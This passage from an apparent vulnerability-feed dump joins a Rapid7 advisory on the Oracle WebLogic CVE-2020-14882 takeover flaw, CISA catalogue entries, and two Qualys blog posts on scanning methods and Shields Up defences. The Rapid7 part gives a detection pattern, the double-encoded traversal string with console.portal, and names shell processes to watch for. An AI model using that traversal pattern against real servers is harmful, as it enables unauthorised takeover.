internet and within organizations where attackers have or will gain footholds.\n\n## Patch, mitigation, and detection guidance\n\nOrganizations running Oracle 
WebLogic Server should patch **as quickly as possible.** Those that are waiting for a yet-to-occur patch cycle to address CVE-2020-14882 would be well advised to break that cycle in favor of patching as soon as they can. Organizations that are unable to patch immediately should consider the following recommendations as partial mitigations, with the understanding that no mitigation is as effective as patching:\n\n * Ensure the admin portal is not exposed to the public internet; blocking access to the admin portal (TCP port 7001 by default) may act as a partial mitigation until CVE-2020-14882 can be patched.\n * Review application logs for HTTP requests that include the double-encoded path traversal `%252E%252E%252F` and the admin portal `console.portal` in the request URI.\n * Monitor network traffic for suspicious HTTP requests if you have the ability to do so.\n * Monitor for any suspicious processes created by the application, such as `cmd.exe` or `/bin/sh`.\n\n## Updates\n\n * 2020-11-02 \u2014 Oracle has issued a [supplementary advisory](<https://www.oracle.com/security-alerts/alert-cve-2020-14750.html#AppendixFMWl>) for a new CVE ([CVE-2020-14750](<https://attackerkb.com/topics/mzyS1rMcZc/cve-2020-14750-oracle-weblogic-remote-unauthenticated-remote-code-execution-rce-vulnerability>)) which covers an additional, similar unauthenticated remote code execution vulnerability in the same WebLogic component.\n\n#### Vulnerable to CVE-2020-14882? 
Scan Your Environment Today to Find Out.\n\n[Get Started](<https://www.rapid7.com/trial/insightvm>)", "cvss3": {}, "published": "2020-10-29T20:43:56", "type": "rapid7blog", "title": "Oracle WebLogic Unauthenticated Complete Takeover (CVE-2020-14882/CVE-2020-14750): What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882"], "modified": "2020-10-29T20:43:56", "id": "RAPID7BLOG:8E02D06635B184C252A0274FC4A163A6", "href": "https://blog.rapid7.com/2020/10/29/oracle-weblogic-unauthenticated-complete-takeover-cve-2020-14882-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Oracle WebLogic Server contains an unspecified vulnerability, which is assessed to allow for remote code execution, based on this vulnerability being related to CVE-2020-14750.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Oracle WebLogic Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2020-14750", "CVE-2020-14882"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-14882", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Oracle WebLogic Server contains an unspecified vulnerability allowing an unauthenticated attacker to perform remote code execution. This vulnerability is related to CVE-2020-14882.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Oracle WebLogic Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-14750", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2022-11-01T15:01:40", "description": "As new scanning technologies are released, their supposed superiority is touted over the others. 
The problem is, however, that there is no best scanning technology, all of them have strengths and limitations. If recent claims from several vendors are believed, a \u201cbest\u201d scanning method called snapshot scanning exists. But when we look closely, snapshot scanning has advantages for specific use cases, like being able to scan paused workloads, but there are also many areas where a different scanner type would be a better choice. So, is there an optimal scanning method? After reading this blog, it should be clear that the answer is no. At Qualys, we recommend you do not rely on a single scanning method \u2013 instead, use multiple scanning technologies when and where they make the most sense. To that end, Qualys has developed a technology to make various scanner types easy to use and manage, which we call FlexScan.\n\n#### **What Is Snapshot Scanning?**\n\nSnapshot scanning uses scanners that capture images of workloads, i.e., snapshots, from a cloud services provider\u2019s (CSP) runtime block storage and then scans them. Runtime block storage is where CSPs store updated images of cloud workloads and resources. Snapshot scanning is essentially an indirect method of scanning cloud workloads by looking at this block storage instead of directly looking at them with agents.\n\n#### **Places Where Snapshot Scanning Makes Sense**\n\nSnapshot scanning has several advantages that sometimes make it the best choice; the main one is that they allow fast and easy setup to quickly onboard a company\u2019s cloud workloads. Because of how simple it is to get this type of scanner up and running in cloud-only environments, they are perfect for use cases where you need to evaluate cloud environments quickly with comprehensive coverage, like mergers and acquisitions (M&A) scenarios. 
API-scanning has this same quick assessment capability and is even slightly faster at assessing new workloads than snapshot scanning, but API-scanning doesn\u2019t provide comprehensive coverage.\n\nA capability other scanner types don\u2019t provide is a snapshot scanner\u2019s ability to look at images of paused or suspended workloads. Remember, though, that most vendors charge by the number of assets, and paused workloads count as assets, so this capability is not an advantage for everyone.\n\nEven though expensive from a resource standpoint, snapshot scanners can look for malware and sensitive data that require significant computational power. Agents can also do this, but usually, you don\u2019t want to expend workload resources to scan for malware. If you wish to detect malware, snapshot scanners are the best option.\n\n#### **Limitations of Snapshot Scanning**\n\nThere are limitations with snapshot scanners. The most obvious one is that they only work on public clouds. So, suppose you have a hybrid environment, which almost all companies have; you will need to add a second security solution if your vendor only provides snapshot scanners.\n\nSnapshot scanning is also the most expensive detection method due to storage and scanner costs. It is a costly technology to employ, and because its only real strength is easy onboarding, in most use cases, we recommend that it only be used when one-time assessments are needed and leave other use cases to more efficient scanning technology.\n\nThe resource-intensive nature of snapshot scanning also means it is expensive to scan frequently, so most customers that exclusively use this technology scan at most once every 24 hours. A lengthy manual rescan is triggered if a critical zero-day vulnerability is announced. 
We can compare this to Qualys\u2019 Cloud Agent, whose default scan window is 4 hours.\n\nSnapshot scanners have two other limitations. The first is that some information in workloads cannot be discerned by examining a static snapshot. The other is that snapshot scanning does not provide an external view of cloud workloads. For these reasons, snapshot scanning should be supplemented with other scanning methods. Here are two examples of vulnerabilities that snapshot scanning has problems with:\n\nSpring4Shell (CVE-2022-22965) \u2013 You are only affected by the Spring4Shell vulnerability if Java v9 or later is used. By looking at a snapshot image, you can determine whether you have a vulnerable version. However, you cannot know which Java versions are present on the system and, if there are multiple installed versions, which one is being used. This type of uncertainty can lead to false positives.\n\nWebLogic 0day (CVE-2020-14882) \u2013 To detect this vulnerability, you need to determine the install path of WebLogic and assess whether it has already been patched or not. This information can only be determined by executing specific run-time commands, so the vulnerability is hard to detect by just looking at a snapshot.\n\n### When Agents Should Be Used\n\n#### **What Is Agent-Based Scanning?**\n\nAgent-based scanning works by placing a small piece of software, an agent, on the host or workload to scan for vulnerabilities, misconfiguration, and other security issues. Modern agents are usually very lightweight, consume minimal resources, and are easy to deploy and maintain.\n\n#### **Where Agents Make the Most Sense**\n\nAgents are the most flexible scanning method because they excel at detection tasks and can also perform them continuously. They are also necessary if you want an integrated patch management strategy because they can perform active functions like patching and executing customized mitigation scripts. 
Some technologies only support public clouds; however, we all know that almost every large enterprise has a hybrid environment that includes on-premises, private, and public clouds. Agents excel at supporting hybrid environments.\n\nAnother significant benefit of agents is that they excel at providing continuous scanning or short scan window support. No other technology even comes close to agents at monitoring assets continuously or supporting short scan windows. Qualys has a scan window as small as 4 hours, while most vendors typically have a 24-hour scan window.\n\n#### **Limitations of Agents**\n\nAgents require the use of some host resources. However, agent implementations like Qualys\u2019 lightweight agent allow you to control this and limit resources to 2% or less of the server, workload, or desktop. \n\nAgents are easy to install; however, the process is not effortless, especially when compared to snapshot scanning. There is a maintenance component involved with agents, but a well-designed architecture like Qualys\u2019 self-updating and self-healing agents can take almost all of the work out of maintenance.\n\n### **When API-Based Scanning Should Be Used**\n\n#### **What is API-based scanning?**\n\nAPI-based scanning is where you use an API to query an information service. It is often used with public cloud service provider (CSP) services from AWS, Azure, Google Cloud, etc., to get configuration and vulnerability information.\n\n#### **Where API-based scanning makes the most sense**\n\nAPI-based scanning is the fastest to implement, assuming CSP-embedded agents like AWS\u2019s System Manager Agents (SSM) are already being used. API-based scanning also makes the most sense when dealing with highly ephemeral workloads. API-based scanning is also the primary scanner type used by Cloud Security Posture Managers (CSPM); without this method of collecting data, CSPMs wouldn\u2019t work. 
\n\n#### **What are the limitations of API-based scanning?**\n\nAPI-based scanners are great at the limited role of getting data quickly from CSP services. That strength is also their weakness, as they are very specialized in their work and are limited by the services they pull data from. API-based scanning cannot detect CVEs like Spring4Shell (CVE-2022-22965) and Log4Shell (CVE-2021-44228) because it does not have information on any software that is not installed using a package manager.\n\n### **When network scanning should be used**\n\n#### **What Is Network Scanning?**\n\nNetwork scanning uses a scanner that has a network connection to the resource being scanned. This type of scanner is usually virtualized and can reside anywhere, in the cloud, on-premises, etc., as long as it has network connections to the workloads and resources it needs to scan. Network scanning comes in two flavors, authenticated and unauthenticated. The type most commonly used, and the type discussed here, is authenticated network scanning, which means that the network scanner has credentials to access the workloads or resources it scans.\n\n#### **Where Network-Based Scanning Makes the Most Sense**\n\nNetwork scanning is advantageous in two different use cases. It can give you an outside-in view that the other scanners can\u2019t, which is helpful for Payment Card Industry (PCI) compliance, and, in a few cases, it can find vulnerabilities that are difficult to detect with the other scanning types, because network scanning isn\u2019t limited to only looking at information on the workload or resource. It also can look at network traffic responses, allowing you to detect a small set of vulnerabilities that others cannot.\n\nNetwork scanning is also useful in several non-cloud use cases outside this blog\u2019s scope. 
Still, one unique use case is their use in sensitive on-premises environments \u2013 because of how well network scanner communications can be controlled and managed.\n\n#### **Limitations of Network Scanning**\n\nNetwork-based scanning is harder to configure, deploy, and maintain than agent-based scanning, primarily due to the complexity of managing the credentials needed.\n\n### What Users Want \u2013 Multiple Scanner Options\n\nIt is clear that there is no scanning technology that is best for every use case. Our customers have told us they want multiple scanner options which are flexible, easy to use, and can be used on the same workloads, which is why we created FlexScan.\n\nToday we are excited to announce \u2013 the Qualys TotalCloud solution with FlexScan that helps our customers extend the trusted power and accuracy of Qualys VMDR, augmented with flexible agent-based and agent-less cloud-native assessment to simplify the management of cloud-native security. Qualys TotalCloud brings both Cloud Posture Management and Cloud Workload Security into a unified view for prioritizing and reducing your cloud security risk.\n\n### **What Is Qualys FlexScan?**\n\nQualys FlexScan is the new zero-touch, cloud-native way of performing agent and agentless security assessments. FlexScan supports four different scanning methods:\n\n * No-touch, agent-less, cloud service provider API-based scanning for fast analysis\n * Virtual network-based scanning to assess unknown workloads over the network for open ports and remotely exploitable vulnerability detection\n * Snapshot assessment that mounts the workload snapshot for periodic offline scanning including vulnerabilities and OSS scanning\n * Qualys Cloud Agents for comprehensive real-time vulnerability and configuration assessments of workloads\n\n### The Advantage of FlexScan\n\nWith FlexScan, you can use multiple scanning methods to scan a workload to get a comprehensive view of its vulnerabilities. 
For example, a customer with an Internet-facing workload can use both agent-based and network-based scanning to evaluate its vulnerabilities and configurations from both an internal and an external perspective.\n\nFlexScan does not require complex configuration to get up and running. Qualys FlexScan allows users to apply different scanning technologies where they make the most sense, even on the same workloads, with almost no manual configuration.\n\n### **Recommendations on When To Use Each Scanning Method With FlexScan**\n\nNow that you can easily use different scanning methods from the same Qualys platform with FlexScan, we recommend using API-based assessments for your initial scan assessment and for evaluating highly ephemeral instances. Use agent-based assessments for long-running workloads, because this scan method is the most comprehensive and provides the most accurate six sigma vulnerability detection. If your workloads are externally facing or subject to strict compliance standards, consider adding network scanning on these assets. Snapshot scanning can examine stopped or paused workloads, and instances where examining the entire workload\u2019s file system is required.\n\nJoin us for the TotalCloud launch on Wednesday, Nov. 9, at 1:45 pm PT to see FlexScan in action and learn how it enables security teams to address the most pressing cloud-native challenges. 
Register at [www.qualys.com/totalcloud-live](<http://www.qualys.com/totalcloud-live>)\n\nTo learn more about Qualys FlexScan, visit the TotalCloud product page, watch the video, and sign up for a trial.\n\n### Additional Resources\n\n * [TotalCloud sign-up page](<https://www.qualys.com/forms/totalcloud/>)\n * [TotalCloud video](<https://www.qualys.com/totalcloud-video>)\n * [TotalCloud product page](<https://www.qualys.com/apps/totalcloud/>)\n * [Blog - Introducing TotalCloud \u2013 Cloud Security](<https://www.qualys.com/totalcloud-blog>)\n * [TotalCloud press release](<https://www.qualys.com/totalcloud-pr>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-01T13:27:50", "type": "qualysblog", "title": "Why Is Snapshot Scanning Not Enough?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882", "CVE-2021-22965", "CVE-2021-44228", "CVE-2022-22965"], "modified": "2022-11-01T13:27:50", "id": "QUALYSBLOG:0EAB7251347951045CAC549194E33673", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2022-03-04T01:27:17", "description": "**_CISA has created Shields Up as a response to the Russian invasion of Ukraine. Qualys is responding with additional security, monitoring and governance measures. This blog details how and what our enterprise customers can do to immediately strengthen their security posture and meet CISA\u2019s recommendations._**\n\nWith the invasion of Ukraine by Russia, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) has created a [program titled Shields Up](<https://www.cisa.gov/shields-up>) and provided specific guidance to all organizations. The Russian government has used cyber operations as a key component of force projection in the past and has targeted critical infrastructure to destabilize a government\u2019s response capabilities. Critical infrastructure can include supply chain (including software supply chain), power, utilities, communications, transportation, and government and military organizations.\n\n### Protecting Customer Data on Qualys Cloud Platform\n\nQualys is strongly committed to the security of our customers and their data. In addition to proactive risk mitigation with continuous patch and configuration management, we continually monitor all our environments for any indication of active threats, exploits and compromises. We hold our platforms to the highest security and compliance mandates like [FedRAMP](<https://blog.qualys.com/product-tech/2022/02/24/meet-fedramp-compliance-with-qualys-cloud-platform>). However, given the heightened risk environment around the globe, the Qualys Security and Engineering teams have been at a heightened state of vigilance in recent weeks. We continuously monitor our internal systems in this amplified threat environment. We are working with our security partners to access the latest threat intel. 
We have implemented additional security, monitoring, and governance measures involving our senior leadership and are committed to ensuring that the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>) remains available and secure to support the enterprises we serve worldwide.\n\n### Urgent: Assess and Heighten Your Security Posture\n\nBased on high-level guidelines provided by CISA, Qualys recommends that all organizations take the following actionable steps to adopt a heightened cybersecurity posture and protect critical assets.\n\nThere are 4 steps necessary to strengthen security posture per CISA\u2019s Shields Up guidance:\n\n * Step 1: Know Your Shodan/Internet Exposed Assets Automatically\n * Step 2: Detect, Prioritize, and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n * Step 3: Protect Your Cloud Services and Office 365 Environment\n * Step 4: Continuously Detect a Potential Intrusion\n\n* * *\n\n**Implement CISA\u2019s Shields Up Guidance**\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### Step 1: Monitor Your Shodan/Internet Exposed Assets\n\n#### Discover and protect your external facing assets\n\nAn organization\u2019s internet-facing systems represent much of its potential attack surface. Cyber threat actors are continuously scanning the internet for vulnerable systems to target in attacks and campaigns. Often hackers find this information readily available on the dark web or in plain sight on internet search engines such as Shodan.io.\n\nInventory all your assets and monitor your external attack surface. [Qualys CyberSecurity Asset Management (CSAM)](<https://www.qualys.com/apps/cybersecurity-asset-management/>) provides comprehensive visibility of your external-facing IT infrastructure by natively correlating asset telemetry collected by Qualys sensors (e.g. 
Internet Scanners, Cloud Agents, Network Passive Sensors) and key built-in integrations such as [Shodan.io](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/qualys-integrates-with-shodan-to-help-map-the-external-attack-surface>) and Public Cloud Providers.\n\nOne of the biggest risks is unknown unknowns. These gaps in visibility happen for many reasons \u2013 including shadow IT, forgotten websites, legacy services, mergers & acquisitions (M&A), or simply because a development team exposes an application or database without informing their security team.\n\nCSAM enables you to continuously discover these blind spots and assess their security and compliance posture.\n\n#### Monitor Industrial Control Systems and Operational Technology\n\nNetwork segmentation traditionally kept Industrial Control Systems air-gapped. However, the acceleration of digital transformation has enabled more of these systems to connect with corporate as well as external networks, such as device vendors and Industrial IoT platforms. Further, the majority of Operational Technology utilizes legacy, non-secure protocols.\n\nBuild full visibility of your critical infrastructure, network communications, and vulnerabilities with Qualys Industrial Control Security (ICS).\n\n#### Detect and disable all non-essential ports and protocols, especially on internet exposed assets\n\nInventory your internal and external-facing assets, and report open ports and the services detected on each port. Qualys CSAM supports an extensive query language that enables teams to report and act on detected external-facing assets that have a remote-control service running (for example Windows Remote Desktop).\n\n#### Ensure all systems are protected with up-to-date antivirus/anti-malware software\n\nFlag assets within your inventory that are missing antivirus, or whose signatures are not up to date. 
CSAM allows you to define Software Rules and assign required software to a specific scope of assets or environment. For example, all database servers should have antivirus and a data loss prevention agent.\n\nVerify that your antivirus/anti-malware engine is up to date with the latest signatures.\n\nFor devices missing antivirus or anti-malware, [Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) with Integrated Anti-Malware can be easily enabled wherever the Qualys Cloud Agent is installed to provide immediate threat protection. In addition to basic anti-malware protection, Multi-Vector EDR monitors endpoint activity to identify suspicious and malicious activity that usually bypasses traditional antivirus, such as Living-off-the-Land attacks, as well as MITRE ATT&CK tactics and techniques.\n\n### Step 2: Detect, Prioritize and Remediate CISA's Catalog of Known Exploited Vulnerabilities\n\nQualys researchers analyzed all 300+ CVEs from the CISA known exploited vulnerabilities catalog and mapped them to Qualys QIDs. Many of these CVEs have had patches available for several years. A new \u201cCISA Exploited\u201d RTI was added to VMDR to help customers create vulnerability reports focused on CISA exploited vulnerabilities. Customers can use the VMDR vulnerabilities page or VMDR prioritization page and filter the results to focus on all the \u201cCISA Exploited\u201d open vulnerabilities in their environment. 
\n\nFollowing are some of the critical vulnerabilities cataloged by CISA that are specifically known to be exploited by Russian state-sponsored APT actors for initial access:\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability (CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065| 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n\nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### Remediate CISA recommended catalog of exploited vulnerabilities\n\nFor all CISA cataloged vulnerabilities known to be exploited by Russian state-sponsored 
actors, [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) customers can create patch and configuration-fix jobs to remediate the risk of all such vulnerabilities directly from the VMDR console. Qualys Patch Management maps \u201cCISA Exploited\u201d vulnerabilities detected in the environment to the relevant patches required to remediate them, downloading the patches without needing to go through the VPN. Customers may use Zero Touch patching to automate the process and ensure all CISA exploited vulnerabilities are fixed automatically, including new vulnerabilities added to the CISA catalog in the future.\n\n#### Monitor and ensure your software is always up to date\n\nImmediately know all end-of-support critical components across your environment, including open-source software. Qualys CSAM tracks lifecycle stages and the corresponding support status to help organizations manage their technical debt and reduce the risk of not receiving security patches from the vendor. Security and IT teams can work together to plan upgrades ahead of time by knowing upcoming end-of-life and end-of-support dates.\n\nUse the \u201cPrioritize Report\u201d function in Qualys Patch Management to map software in your environment to the security risk it poses. Prioritize your remediation efforts based on the software that introduces the most risk. Use this report to create automated patch jobs that ensure the riskiest software is always up to date. Alternatively, deploy individual patches for the riskiest software. 
\n\n### Step 3: Protect Your Cloud Services and Office 365\n\nAs noted by CISA, misconfiguration of cloud services and SaaS applications like Office 365 is the primary attack vector for breaches.\n\n#### Detect and Remediate Public Cloud Infrastructure Misconfigurations\n\nProtect your public cloud infrastructure by securing the following services as a priority:\n\n * **IAM**: Ensure all users have MFA enabled and rotate all access keys older than 30 days. Verify that all service accounts are valid (i.e. in use) and have the minimum privilege.\n * **Audit Logs**: Turn on access logging for all cloud management events and for critical services (e.g. S3, RDS, etc.)\n * **Public-facing assets**: Validate that the firewall rules for public-facing assets allow only the needed ports. Pay special attention to RDP access. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.\n\nAutomatically detect and remediate cloud misconfigurations using [Qualys CloudView](<https://www.qualys.com/apps/cloud-security-assessment/>).\n\n#### Protect your Office 365 and Other SaaS Services\n\nEnforce multi-factor authentication on all accounts with access to Office 365 tenants. At a minimum, enable MFA for accounts with any admin access rights to the tenant. [Qualys SaaSDR](<https://www.qualys.com/apps/saas-detection-response/>) lists all such accounts on which MFA is disabled. Further, Qualys SaaSDR enables continuous security posture assessment of Office 365 via the CIS (Center for Internet Security) certified policy for Office, along with automated security configuration assessment for Zoom, Salesforce, and Google Workspace. 
This is based on an analysis of all security weaknesses, critical vulnerabilities, and exploits leveraged by attackers in historical attacks as well as security assessments based on the MITRE ATT&CK framework.\n\n\n\n### Step 4: Continuously Detect any Potential Threats and Attacks \n\nMonitor for increases in suspicious and malicious activities as well as anomalous behavior on all endpoints. With Qualys Multi-Vector EDR, customers can detect Indicators of Compromise (IOC) and MITRE ATT&CK Tactics & Techniques provided by CISA and respond quickly to mitigate the risk by capturing process, file, and network events on the endpoint and correlating them with the latest Threat Intelligence, including new and upcoming Indicators of Compromise (IOC) constantly added by the Qualys Research Team. Anomalous endpoint behavior is detected and identified as MITRE ATT&CK Tactics and Techniques.\n\n\n\nThe Appendix at the bottom of this post contains a list of Indicators of Compromise (IOC) and MITRE ATT&CK Tactics & Techniques being utilized.\n\n## Take Action to Learn More about How to Strengthen Your Defenses\n\nWe encourage you to learn more about how to strengthen your defenses consistent with CISA Shields Up guidelines using Qualys Cloud Platform. Join our webinar, [How to Meet CISA Shields Up Guidelines for Cyberattack Protection](<https://event.on24.com/wcc/r/3684128/0F6FB4010D39461FD4209A3E4EB8E9CD>), on March 3, 2022.\n\nQualys recommends that all organizations, regardless of size, heighten their security posture based on the above actionable steps, to protect critical cyber infrastructure from potential state-sponsored, advanced cyberattacks. Qualys Cloud Platform remains continuously committed to high standards of security and compliance to safeguard customer data. 
In this amplified threat environment, the entire Qualys team is available to help our customers improve cybersecurity and resilience.\n\n* * *\n\n**Implement CISA\u2019s Shields Up Guidance**\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### **Appendix:**\n\n#### CISA catalog of known exploited vulnerabilities by state attackers\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-1653| 13405| Cisco Small Business RV320 and RV325 Router Multiple Security Vulnerabilities| 1/29/2019| 7.5 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-9670| 375990| Zimbra XML External Entity Injection (XXE) Vulnerability| 8/12/2021| 9.8 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability (CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021-26857, 
CVE-2021-26858, CVE-2021-27065| 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n\nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### List of IOCs related to Hermetic Wiper aka KillDisk\n\n#### List of MITRE ATT&CK TIDs provided by CISA\n\n**Tactic**| **Technique**| **Procedure** \n---|---|--- \nReconnaissance 
[[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)]| Active Scanning: Vulnerability Scanning [[T1595.002](<https://attack.mitre.org/versions/v10/techniques/T1595/002/>)]| Russian state-sponsored APT actors have performed large-scale scans in an attempt to find vulnerable servers. \nPhishing for Information [[T1598](<https://attack.mitre.org/versions/v10/techniques/T1598>)]| Russian state-sponsored APT actors have conducted spearphishing campaigns to gain credentials of target networks. \nResource Development [[TA0042](<https://attack.mitre.org/versions/v10/tactics/TA0042/>)]| Develop Capabilities: Malware [[T1587.001](<https://attack.mitre.org/versions/v10/techniques/T1587/001>)]| Russian state-sponsored APT actors have developed and deployed malware, including ICS-focused destructive malware. \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]| Exploit Public Facing Applications [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)]| Russian state-sponsored APT actors use publicly known vulnerabilities, as well as zero-days, in internet-facing systems to gain access to networks. \nSupply Chain Compromise: Compromise Software Supply Chain [[T1195.002](<https://attack.mitre.org/versions/v10/techniques/T1195/002>)]| Russian state-sponsored APT actors 